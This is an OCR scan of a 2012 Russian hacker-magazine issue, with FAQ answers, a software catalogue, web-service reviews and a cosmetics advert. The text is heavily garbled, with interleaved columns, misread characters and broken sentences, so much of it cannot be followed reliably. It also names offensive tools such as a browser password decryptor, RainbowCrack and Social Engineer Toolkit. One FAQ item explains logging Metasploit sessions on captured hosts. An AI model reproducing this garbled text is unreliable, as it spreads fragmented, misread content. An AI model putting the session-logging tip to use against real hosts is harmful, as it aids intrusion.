как раз под идентификацию файлов внутри

ПОДГРУЖАТЬ ПОЛЬЗОВАТЕЛЯМ И ЗА­

написан на РНР или Pythoпl, то

образов пр ошивок. Для этого в нее включен

БИРАТЬ ОТ НИХ ПРАКТИЧЕСКИ В РЕ­

10

набор сигнатур для файлов, часто встречаю­

АЛЬНОМ ВРЕМЕНИ. ТАК КАК СЕЙЧАС

miпdshtoгms- придется еще поработать

щихся в прошивка х, заголовков fiгmwaгe, ядер

РАЗРАБАТЫВАЕТСЯ ПРОТОТИП СИСТЕМЫ,

напильником и написать собственный

скорее по хож на конс тр уктор

Socket. LEGO API

Linux,

бутлоадеров, файловых систем и т. д .

Я ХОЧУ ПОЙТИ ПО ПУТИ НАИМЕНЬШЕГО СОПРОТИВЛЕНИЯ И РЕАЛИЗОВАТЬ ВСЁ

для интеграции в существующий проект.

r.1

КАК ПОЛ УЧИТЬ_ КОЛИЧ~СТВО

МАКСИМАЛЬНО ПРОСТО. НО КАК?

в виде push-cepвиca , который позволяет

Однако Comet-cepвep можно арендовать

1.;.1 ПОДКЛЮЧЕНИИ К МОЕИ БАЗЕ ДАННЫХ

lr.'l 181

поддерживать реал-тайм общение между

А

MYSQL?

Вообще , с писок всех активных клиентов

выдает команда show pгocesslist.

Здесь нужно вспомнить про Напомню,

Comet- зто

Comet.

клиентами проекта, не создавая и не под­

держивая собственную серверную инфра­

набор

структуру. Из наиболее известных могу

приемов и средств, позв оляющих

быстро обновлять данные в браузере

выделить: Pusheг lpusheг. Cometl,

Используя таблицу pгocesslist из БД

(страницы и их элементы! без участия

lwww. pubпub.com l, Paгtcl lc ode . google .

infoгmation_schema, мы также можем получить

пользователя . Подробнее об этом наборе

нужную информацию с помощью SQL-зaпpoca:

можешь прочитать в нашем материале

com/p/paгtcl l, BeacoпPush lbeaco npush. com l, X-Stгeam. l y lx - st г eam. l y l и i oBгidge

<< Реал-тай м в Вебе: технология

liobгidge.com l. Подробнее об их исполь­

Comet для

построения быс трых веб-приложений>>

mysql -u root -р -BNe "select host,count(host) from processlist group Ьу host;" information_schema

Pubnub

зовании ты можешь прочитать в благе

I Ьit. l y/yZ70tH I. Самое простое- уст а­

наш его автора Александра Лозовюка IЬit .

новить один иэ Соmеt-серверов, на-

ly/yLJcqm l.

КАК СОХРАНИТЬ ВЫВОД В ФАЙЛЕ MSF?

ДЛЯ В

Metasploit

Fгamewoгk довольно долго

су ществовала одна проблема, которая заклю чалась в том, что сохранить вывод

в файле обычными средствами было невозможно. Всё отображалось в консоли,

и текст даже можно было скопировать с помощью стандартного <Ctгl +С> , но при большом объеме информации это уже ста новилось затруднительным. Конечно, у

MSF

есть удобная база данных, но,

к сожалению, туда стекае тся дал еко не всё, а только избранное из тех модулей , которые у меют с такой базой работать. В конечном итоге приходилось использовать разные

костыли. Но свершилось чудо! У разработчи­ ков наконец-то дошли руки д о этой пробле­ мы, и всё у пр остилось донельзя' Теnерь мы можем просто запусти ть

з

MSF

и ввести

Фреймворк изначально развивалея как набор гайдлайнов для програм­ мистов и объединил в себе лучшие

практики и примеры, накопленные в Twitteг.

Сервис Pusher позволяет в реальном времени доставлять сообщения веб-приложению, работающему на любых устройствах

в

Bootstгap изначально проектиро­ вался так, чтобы корректно работать с jQuегу-плагинами . Таки м образом,

5

Использовать BootStгap могут как продвинутые разработчики, которые хо тят сэкономить время, так и те,

ть1 максимально просто можешь реализовать

кому нужно сделать качественный интерфейс

Поверь, эти парни з нают, что такое правиль­

интерактивное взаимодействие с пользова­

на коленке, не заморачиваясь изучением со­

ньlй код. Док ументация поможет тебе мак­

телем, прибегнув к знакомым инструментам.

временных технологий . В противном случае

симально быстро въехать, как использовать

На специальной странице сейчас доступно

придется долго чесать голову, как сделать

Bootstгap . На сайте есть три готовых шаблонов

специальных jQuегу-плагинов, в том числе для

для быстрого страта.

выпадающего меню, табов и т.д.

ХАКЕР

03/158/ 2012

12

красивые кнопки, прогресс-бары, метки и т. д.

1~1


UNITS/FAQ UNITED команду spool /г oot /ow ned _ info.txt. Здесь /гo ot /ow ned _i nfo . t xt - п у ть к файлу для со­

для nр осмо тр а по с л е дни х за п исей журнала.

х ранения вывода из

подробный жур нал событий, с п омо щь ю

MSF

и имя э тог о файла .

Что еще интереснее, по заявлениям ра зра ­

ко тор ого можно выяснить все nричины сбоев

ботчиков,

оnера ц ио нной системы .

spool

при включ е нии логир уе т и вы­

утечки информации через сети, файлы

В результате п о ль зова те ль n о л у ч ает

иSMS; обхо ды разрешения;

• •

криnтографическиео п ера ци и, пр о в е ден­ ные через Andгo id

воды со всех сессий [шеллы на з а х вач ен ны х хос та х l . Это, согласись, очень удобно . Для

r.1

ХОЧУ Ч У ТЬ ПОМОЧЬ РОДНОМУ

отк лючения л о гирования служит команда

1,;,1 ДЕКАНАТ У И НЕМНОГО

spool off.

АВТОМАТИЗИРОВАТЬ ЕГО

отправленные

r.1

В Windows - cиcтeмe ест ь о дн о критиче-

1,;"1 ски важное прил ожение. Не обхо дим о,

НЕТ ВОЗМОЖНОСТИ . ЕСТЬ ЛИ КАКАЯ-ТО

чтобы оно всегда бы л о за n у щ ено. В с л учае

АЛЬТЕРНАТИВА ДОРОГОСТОЯЩЕМ У

краша необходимо за п устить его заново. Как

ПРОСМОТРА , ЧТОБЫ РАБОТАЛ ПОД

СКАНЕРУ?

э т о реализовать?

8:'1

n

:1.

АНАЛИЗА НЕ ПРЕДЛАГАТЬ

W

Е сли не подойдет обычная USВ -камера,

181

Я для этих целей исполь зую о чень

прикольн ую у тилит у glogg [~

и совер ш енн ы е теле­

СКАНЕР ШТРИ Х-КО ДОВ , НО КУПИТЬ ЕГО

СТЬ ОГРОМНЫЕ Л~Г-ФАЙЛЫ. 1,;,1 ПОДСКАЖИ КАКОИ-НИБУДЬ УДОБНЫЙ ИНСТРУМЕНТ ДЛЯ ИХ ВИНДОЙ И НИКСАМИ. GREP ДЛЯ

SMS

фонные ВЫЗОВЫ.

ДОК УМ ЕНТООБОРОТ . ДЛЯ ЭТОГО Н УЖ ЕН

r.1

API;

про е л у шан ные Ьгоаdс аst-сооб щ е н и я;

Нужен такой инструмент, который,

то можно заюзать старую оптическую

во-первых, мониторит за п уще нны е

мышку. Е е сенсор очень быст ро nолучает

nроцессы и сервисы и, во-вторых, может их

изображение с небольшой nоверхности,

nерезаnустить их в случае неполадок. Я

bonnefon . oгg l . Она раб отает n о д разными ОС

з аn оминает его и по координатамХи У

и позволяет выполнять nои ск и анализ

вычисляет смещение от н осите льн о nредыду­

п о о-о-о -чень большим лага м. Особенно

щей nозиции. Умельцы на учил и сь исnользо­

использую для э т ого Knas Restaгteг [www. knas .sel. П ереза n уск, вnрочем, не е дин ст в ен­ ное возможное действие, которое Knas

приятн о, что графиче ский интерфейс

вать э т о для захвата изображений с помощью

Restaгteг выполняет, обнаружив пр облему

д опо лня ет в с я мощь у тилит gгер и

A гduin o. П одробности ты можешь прочитать

унекоторого прил ожения. Логи ку можно

в ста ть е от webaff [ Ьit.ly/zNDkpD I.

nереоnределить .

r.1

r.1

less.

r.1

ПОЧЕМ У-ТО ОБХОЖУ СТОРОНОЙ 1,;,1 ЛОГИ WINDOWS , СЧИТАЯ И Х

ВЫ НЕРЕДКО ПИШЕТЕ

П ОМО ГИТЕ РЕШИТЬ ПРОБЛЕМ У.

БЕСПОЛЕЗНЫМИ. НО ВДР У Г Я ЧЕГО-ТО

1,;,1 О « ПЕСОЧНИЦА Х», ПО ЗВО ЛЯЮЩИ Х

НЕ ПОНИМАЮ И ОНИ МОГУТ ПОМОЧЬ

ЗАПУСТИТЬ ПРОГРАММ У

ВЫЯСНИТЬ ПРИЧИНЫ, СКАЖЕМ, ЧАСТЫ Х

В ИЗОЛИРОВАННОМ ОКРУЖЕНИИ

СБОЕВ?

И ПОСМОТРЕТЬ , ЧТО ОНА ДЕЛАЕТ

И ТОЙ ЖЕ ПРОГРАММЫ , КОТОРЫЕ НЕ УЖИВА ЮТСЯ МЕЖДУ СОБОЙ, ТО ЕСТЬ В ОПЕРАЦИОННОЙ СИСТЕМЕ МОЖНО

n

В СИСТЕМЕ. А ЕСТЬ ЛИ ТАКИЕ РЕШЕНИЯ

УСТА НОВИТЬ ЛИБО ОДНУ ВЕРСИЮ, ЛИБО

ДЛЯ МОБИЛЬНЫ Х ПЛАТФОРМ ?

ДР У Г УЮ. КАК РЕШИТЬ ЭТУ ПРОБЛЕМ У,

n

ОТДЕЛЬНУЮ ВИРТ УА ЛЬН У Ю МАШИНУ?

В лагах фиксир у ются вс е сбои идей­

ствия, выnолнявши ес я за п осле дн ее

W

время на данн ом ком пьютере . Это значит, что

1,;,1 ЕСТЬ ДВЕ РАЗНЫЕ ВЕРСИИ ОДНОЙ

НЕ СОЗДАВАЯ ДЛЯ КАЖДОЙ ИЗ НИ Х Е сть дл я Andгo id! Это nроект D гoid B ox

благо даря им мо жно выявить при чину

181

неполадок, но ты nрав : выудить нужные

заnускае т мобил ьны е nриложения в изолиро­

данны е из огромного количества информа ции

ван ной сре де и наблюдает за их n оведе ни ем.

- за дача неnростая . Раз обраться в лагах

П олуче нный отчет включает:

бес nлатн ую утилит у Evalaze [www. evalaze .del. Что она делает? Создает для

помог у т у тилиты

выбранного прило же ния виртуальное окруже­

Windows Event Viewe г Plus

хеш и анализируемого nр и ло же ния ;

[ http:UЬit . ly/znh9fS I и Windows 8 Log Collectoг

[http://bit.ly/wyDIOml. По с ледняя сама

исходя щи е/вхо дящи е сетевые данные;

• •

собирает и nр о то колируе т все н уж ные

[ code . google.com/p /dгoidbox l , который

данные, nозв о ляя nри этом выбрать область

n

Я в т акой ситуа ции исnользовал

181

ни е со своей файловой системой и реестром.

о n ерации с файлами;

Это называется вирт уализа ция nрилож ений.

за п уще нны е се рви сы и классы, загружен­

Такой nодход по з в оляет п е р е н осить пр и л оже­

ные через D exCiass l oadeг;

ния с о дн ой систему н а др у г ую без ус тан о в ки и, что важно в нашем слу чае , за п уска ть

на о дн ой системенесовместимые друг

...

1od•

.....

lv......,nglogs on С1

с др угом nрил оже ния ! Этот под хо д так же

АСК·РС

_J Appttc3tion _J

H:.rdw3ro Eve-nts

_j Кеу M81:tgomctr'C Semce

r.\codQ Cerltм

_J

Systom TuneUp

MкrosoA Ofrкo

Туре

AJoltS

Sкunty

Trme

Ev<n~IO

Sowce

18.5906 165906 185906 18'5906 18.5909 18'592!> 185929 16.5933 1901.3-4 190136 1901 38 190138 1901.38 190206

1073745925

\'l8'11o9on 'flc:lnlfy

lnform;Ьon

lnfotmaiiOn

06-о<-2010

lnto •mвьon

2010 06-04-2010 06-04·2010

lrtform;!Ьon

tnfcmnaьon lfllormзuon о

lnfoтm;Ьon lnformaьon Юformaьon lnfoJm3tюn

ео lnformitiiOn

06~

lnfotтnaЬon

06-()4 2DIO 06-04-2010 0&04·2010 06-()4·2010

lntormaiiOC"'

06·~20 1 0

lnlormaьon

(t lnfotmaьon lnform;rьon

Come<\10 ] R9motePC

D""' 06-04-2010 06-04·2010 0&04·2010 06-()4 2010 06-04·2010 06-04·2010 0&04·2010 06-()4 2010 06-04·2010 06-04·2010

lnform:.ьon

.J lntcrne-t Ь:pl orer

..J ..J

час т о nр именяе т ся для за n уска старых

]

Ava1lable- Evtnl k)g;$

21474-

300

UИt"Name

ESE Т ESENT

nриложений или игр nод уnравле ние м совреме нны х ОС.

r.1

МОЖНО КАК-НИБУДЬ

301 32212310119 301

\1

1,;,1 ПРИМОНТИРОВАТЬ МОИ

ESENТ

ДО КУМ ЕНТЫ, КОТОРЫЕХРАНЯТСЯ

302

ESENТ

1073742827 I073H2n4 1 1073742890 1073742827 1073742726 1040

\'l.ndQI.to--s Sea.ch Sемсе

U$~;1af4r

АСК.РС\дСК

1~02 '53

10000

w.к:toson W1 ndo~ Rё-s:\arl .

ACK.PCIACK

190013 190013 1900 13 190013

нn4

Мsitlst311er

АСК.РС\дСК

работать сон лайн-фа й лам и т ак же, как и с

103< 1042 10001

М:s.i'-1;13hr

АСК.РС\АСК

локальными. Н а пример , редактировать

М:silnstalkl r

NTAUTH

мaoson-'N 1ndows Rм1ill

АСК.РС\дСК

д окуме нты из

/8'1Mgrnt

SortA-.:11~

В

GOOGLE DOCS,

ЧТОБЫ ОТКРЫВАТЬ И Х

ЧЕРЕЗ ОБЫЧНЫЙ <<ОФ ИС >>?

Protf!cbon PЬifor

StcunryCenter

n

SottA·are Protecoon Pialfo1 Sott...·are P1otecьon Ptзlfor

181

So,..':lre Protecbon PЬifor

Мой отве т- использовать Joukuu [www.joukuu .com l. П о дключив к Joukuu

<<облачные>> хра нилища [сейчас она работает

с DгорЬох, Google Docs и Bo x.net l, можно

Google Docs

в

Mi croso ft Office

или любом др угом офисном nа к ете , и о н и буд ут автоматически синхронизироваться

Удобная тулза для nр о смотра логов Windows-cиcтeмы

11,2

с

Google. ::х:

ХАКЕР

03/158/ 20 12


RaidCall 6.0.8 ReaiVNC 4.1

MetroTwit NeoDownloader 2. 9

Alpine 2.0 AthTek NetWalk Home Edition Blueloolh 5tack 5wilcher 1.1 DreamMai14.6.9.0 е Т oolz 3.4.8 FTP 5cheduler

>Net

>Multimedia Caesium 1.4.1 Color Desker Free Audio Edilor 2011 Free Video Dub 2.0.3 I.m..geGiass 1.4 IOGraph 0.9 Joukuu 1.1.5 KooBits 4.0 Little Piano 1.0.1 Motion Man MuseScore 1.1 MusicBee 1.3.4334 5can Т ailor О. 9.11 5tealth Player 1.0 view3dscene 3.11.0 Windows 7 Logon Screen Tweaker 1.5

Madдpplauncher 1.1 NexusFile 5.3.1 Pokki Process Blocker О. 7 bela RED 2.2 TaggedFrog 1.1 UndoCiose 1,1 Volume Concierge

150 Workshop 2.1 Lion UX Pack 1.0

Duglicate Commander 2.2

Web5torm 3.0.1 Zend 5tudio 9

Cammunit:t Edition

»WINDOWS >DeveJoement A5MTooi1.3.1BETA BinVis Box20Fiash 2.1 а FlashDevelop 4.0.1 Geany 0.21 haXe 2.08 LINQPad 4.31 MongoDB 2.0.2 PluThon 2.0.0 Re5harper 6.1 5elenium IDE 1.6.0 5Qlite 3. 7.1 О Unigue 0.25 Visual Paradigm for UML 8.3

Ргоч

Switcher

Echinus 0.4. 9 Eina 0.14.0 Huain 2011.4.0

Converseen 0.4.8

Cinnamon 1.1.3 Clemenline 1.0.0

Asunder 2.1

»UNIX >Desktoe

MyDefrag 4.3.1 P-Apps 1.0 Puran Defrag 7.3 5peed Up 5hutdown UltraDefrag 5.0.2 U58 lmaqe Т ool 1.58 Windows 8 Log Collector 1.0.0.6

Histoa 1/iewer 4.8 Knas Restarter 2.0

Auslogics Disk Defrag 3.3.0.2 DataGrab 1.2.3 Defraggler 2.09.391 DFincBackup 2. 98 Evalaze 1.1

>S~stem

VERA 0.3 Win Т aylor 2.5.1

NEТZOB

0.3.1

loadbalancer-finder v0.5.1

ipl gkd1.10 LFI Fuzzploil Т ool

grinder

FindBugs 2.0.0 Fwknop Porl Knocking Utility 2.0rc5

crackerpassword 1.2. 1 DroidBox

binwalk v0.4.1 BoNe5i 0.2.0

>Securit~

5.61 Tixati 1.82 Window 5wilch 0.12.9 ZMail 0.7

Super FJexiЫe File Synchronizer

Blogilo 1.0 EiskaltDC++ 2.2.5 Firefox 9.0.1 FreeRDP 1.0.0 LAN Messenger 1.2.16 LeechCraf 0.4. 95-578 Masgmail 0.3.4 NTM 1.3.1 ownCioud 2.0. 1 PirateWall 0.2.1 pyload 0.4.9 QupZilla 1.1.0 R550wl 2.1.2 5quidдnalyzer 4.2

~ze0 . 3

>Net

0.5а

>Devel ART 0.9.01 Conlrolled Vars 1.3.1 Eric 5.1.8 Freeglut 2.8.0 FreePascal 2.6.0 Gambas3 3.0.0 GNU Octave 3.6.0 GТК 3.3.10 Jython 2.5.2 LatencyTOP 0.5 libircclient 1.6 mxGraph 1.9.0.2 NetBeans 7.1 РНР 5.3.9 Project'Or RIA 1.9.1 &.Qortico 2.3.1 Rudimenls 0.35 Ultimix 1.5.177 wxPython 2.9.3. 1

150 Master 1.3.9 LibreCAO 1.0.0 LibreOffice 3.4.5 Rhythmbox 2.95 Runlens 0.02 5cribus 1.4.0 slowmoVideo 0.2.5 5MPiayer 0.6.10 5yncWall1.1.0 lvpvrd 3.3.4 Xine-lib 1.2.0

Sessionthief 5ikuli-X 1.0rc3 SnD Reverser Т ool 1.4

Scylla lmports Reconst ruction

loadbalancer-finder v0.5.1 Mandianl Redline 1.0.3 RainbowCrack 1.5 Redline 1.0.3 RIP5 0.51 5crapy 0.14

JavaSnoog 1.1 loadbalancer-finder 0.5.1

grinder Hexjeclor 1.0.7.4 HstEx 3.7

FiveBelow

DeЬiaze 0.3 DroidBox ExploitMyUnion 2.1 Fiddler 2.3.8.5 FindBugs 2.0.0

QQgCb

DAVТesl1 .0

85QL Hacker 0.9.0.9 Chrome Password Dec[Y_Q.!.Qr..1d_ CodeReload

Anti-Reversing Framework v1.1

>Securitl

streamWriter 3.6 TunneiBear TweetDeck WeFi 4.0.1.0

ST

Securit~Кiss 0.2.2 5eesmic 0.8.1

9.0

2.2.27

Praat 5.3.04 Raidcall 2.0 ShadowKiller 1.3 5kim 1.3.19 ~ 5peedTа о bela 1 Тftp5erver 3.4.1 TunneiЬiick 3.2.3

Permanent Eraser 2.5.3

iFileX 1.1.1 iTweaX 3.0.2 LimeChal 2.30 Media Т ube 1.0

Шll_

Cappuccino 1.11

Adium 1.4.4 birthdayBook 6.0.6 Boxer 1.2.1

»МАС

РС-850

>X -distr

systemd v38 Usermin 1.580

rxvt-unicode 9.15

Coreutils 8.15 fstransform 0.3.7 lpt-netflow 1.7.1 LCMC 1.2.0 Linux 3.2.2 Loadbars 0.4.0 oobash 0.39.1 OpenNebula 3.2.0 OpenNM5 1.8.17-1 Parallel 20120122 Raider 0.9.2

Calculate-assemЬie

>5yslem

.!:QiliЮOL9.1.2

>Server Apache 2.2.21 Aslerisk 10.1.0 BIND 9.8.1-pj CUP5 1.5.0 Dhcp 4.2.3-р2 Dovecol 2.0.17 FreeRADIU5 2.1.12 lighllpd 1.4.30 Мy5QL 5.5.20 N50 3.2.9 OpenLDAP 2.4.28 QpenVPN 2.2.2 Postfix 2.8.7

Scapy 2.1.0 5crapy 0.14 Social Engineer Toolkit v2.5 5pamdyke 4.3.1 5shguard 1.5 sslyze 0.3 5tegnate 0.0.1 хса 0.9.1

MHTipHIT•MitiiMMIJ(

IIIOППMMryiKMTIIICIIMI

Иc'll p nWIIIOЩMIIrидno

h5


UNITS/WWW2

IIВD ifttt .com

Triggers and Actions come from Channels. Channels are the unique services and devices you use every day. Some example channe!s :

Название сервиса представляет собой аббревиатуру IFТТТ:

«i f this, then that»- <<ес ли

это, тогда то ». Это блестящий инструмент, с nомощью которого можно связать между

собой популярные веб-nриложения:

Gmail,

ОгорЬох , Eveгnote, lnstapapeг,

Facebook,

Twitteг, lnstagгam, Fouгsquaгe и другие. К примеру, можно задать правило: если сме­ нилась а ватарка в

Facebook,

то использовать ее как аватар в Твиттере. Или другое:

если завтра будет дождь. то предупредить меня

All Channels

no SMS.

Если кто-то зафрендил меня

в Твиттере, то отправить ему nриветствие в личном сообщении. Если в

Gmail

отмечено

какое-то письмо, то создать заметку в Eveгnote. Если nоявилась новая запись в ленте, то отправить мне ее по

--

e-mail . И

RSS-

так далее.

Связующее звенодля различных интернет-сервисов

........."......

о

___.__...._"'"'_'_.,_

bnckнn Nu...Ь.r Genefi\Of _..., , IIН!l_._

1!1

ltANDOM.ORG •

~

...,,

....

Tru~~

_ ~uu_,r.-

Random Numl>« S..VП

=":.'..::~':.:z....-w

. --.. ~-- ..-

.

R.nclomnumЬ.r geNO"Ition - W.Iopedil.thl!ffн~

.-..-pllpial-....._.,..,_ •.. ,._, .. __ .. "_,..Nt_..,,... .... lo. _ _ _

· -- ---ь

~~--.,

DUCKDUCKGO duckduckgo.com

Q O.i7J112J\t0ПU4/r-~

..

Ra........,Num~r ~IIOf&Ched<fi' · Psychk:Sdenl:e ­

:::::.,. ,--.,.. ,._---ь-

,.....,~----

Если кратко, то это поисковик для гиков. Проект активно развивается с и предоставляет несколько люб опыт ных фишек. Во-первых ,

не следит за пользователями и их запросами- по крайней мере, анонимность обе­ щают его создатели. Во-вторых , он поддерживает горячие клавиши, чтобы было удобно пользоваться поиском даже с помощью одной только клавиатуры. В-третьих, п оль­

зователю предоставляется огромное количество так называемых

goodies,

позв оляю­

щих прямо из пои ско вой с троки вы пол нzть самые разные действия [арифметические вычисления и т.n .]. К тому же в

nоисковикдля гиков с удобными фишками

2008 года OuckOuckGo вообще

OuckOuckGo практически отсутствует поиск овый сn а м

и реклама [во всяком с лучае, пока- когда nроект еще не очень nоп улярен] .

llt!W+i&t•itl nazamok .com Прошли те времена, когда взлом мог ограничиться только дефейсом. Сейчас каждый пытает ся извлечь для себя выгоду. Поэтом у на взломанном ресурсе тут же могут поя­

виться JavaScгipt и IFгame с виру сом или рекламой. Илидорвеи и фишинговые стра­ ницы . В кон це концов , скр ытые внешн ие ссылки, которые помогут какому-то ресурсу

нара стить ссылочную массу . Автоматизирован но проверять каждую страницу ресурса на наличие подозрите льных элементов по з воляют различные сервисы, один из них

- nazamok.com . Прое кт

еще только стартует, поэтому во вр емя бета-тестирования ты

можешь бесnлатно добавить nять сайтов с мониторингом

150 страниц

nервого , второго

и третьего уровня . Пр оверка будет производиться раз в день, а уведомления отправ­ Мониторинг сайта на появление подозрительных элементов

ляться на

e-mail.

ЛАБОРАТОРИЯ Х АКЕРА

www.hacking- lab.com Во многих статьях мы пишем фраз у « исключительно в ознакомительных целя х» . Чтобы nоnробовать полученные знания в деле , прокачивая свои навыки в области информаци­ онной безопасности, созданы специальные площадки . Здесь ты можешь эксnерименти­ ровать сколько влезет и при этом не нарваться на серьезные неприятности с законом.

В рамках проекта

OWASP

открылась так называемая лаборатория

Ha cking- Lab . Загрузив

сnециальный дистрибутив [в виде LiveCO или образа для ViгtuaiBox], ты можешь устано­ вить VРN-соединение со специальной инфраструктурой, где всем желающим предлага­ ется десять подготовленных nрофе ссиона лами квестов. Прохо дя каждое из заданий, ты nесочница для хакера

зарабатываешь баллы,- получается своего рода соревнование для хакеров. Дерзай.

ХАКЕР

03/158/2012



- ~ vv EFSR ~~;ЕнЕ~ РОШЕ _СОЗДАТЕЛЬ РАСТИТЕЛЬНОЙ КОСМЕТИКИ

ЭФФЕКТИВНОСТЬ ПРОТИВ ПРЫШЕЙ И БЕРЕЖНОЕ ОТНОШЕНИЕ К КОЖЕ Исследователи

Растительной

Косметики

Ив

Раше

обьединили

салициловую кислоту, обладающую антибактериал ь ным эффектам и

способствующую обновлению кажи, для эффективного ваздействия на прыщи, и экстракт мякоти Алоэ Вера БИО, палу<ивший признание благадаря

своим

васстанавливающим

свойствам,

для

гарантии

оптимальной переносимости кожей.

Эффективность докозоно:

- Глубоко очищает кожу. -Устраняет черные точки.

- Предупреждает появление прыщей и черных точек.

Присоединяйтесь www.yves-rocher.ru Тел.:

8-800-3333-000

(звонок бесплотный!

Реклама. Товар сертифицирован. ( 1) Сомостоятельная оценка, тест но удовлетворенность 26 человек.

продуктом, проведенный при участии

* ФорУ~упо со;щона rюддерv.атолоrическиw. КОН'ГfЮпем Рексwендовоно Фf:юнцузскими дер-ютопоrами.

РЕКОМЕНДОВАНОl

~РМАТОЛОГАМИ .


Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.